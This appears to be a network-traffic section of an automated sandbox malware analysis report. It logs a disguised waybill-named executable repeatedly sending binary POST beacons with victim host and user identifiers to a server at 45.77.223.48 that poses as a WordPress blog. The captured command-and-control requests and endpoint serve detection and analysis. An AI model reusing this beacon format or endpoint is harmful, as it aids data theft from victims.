                                              Apr 25, 2024 09:41:59.646034002 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:41:59.646275997 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:41:59.646289110 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.44974545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:41:59.827008009 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:41:59.956965923 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:00.768182993 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:41:59 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:00.768244982 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:00.768346071 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:00.768455029 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:00.768543005 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:00.776303053 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:00.776660919 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:00.777019024 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:00.777092934 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:00.777260065 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.44974745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:01.045653105 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:01.173758030 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:01.994920969 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:01 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:01.995078087 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:01.995270014 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:01.995420933 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:01.995500088 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:02.004235983 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:02.004514933 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:02.004834890 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:02.005096912 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:02.005229950 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.44974945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:02.263835907 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:02.394774914 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:03.227276087 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:02 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:03.227760077 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:03.227794886 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:03.238481045 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:03.238517046 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:03.238554955 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:03.238647938 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:03.238684893 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:03.238723040 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:03.238784075 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.44975245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:03.512691021 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:03.639851093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:04.441059113 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:03 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:04.441215992 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:04.441288948 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:04.450273991 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:04.450953007 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:04.451003075 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:04.451138020 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:04.451410055 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:04.451426983 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:04.451560020 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.44975445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:04.713098049 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:04.840243101 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:05.713538885 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:04 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:05.713641882 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:05.713757992 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:42:05.713814974 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:42:05.713941097 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:05.728957891 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:05.729340076 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:05.730480909 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:05.730565071 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
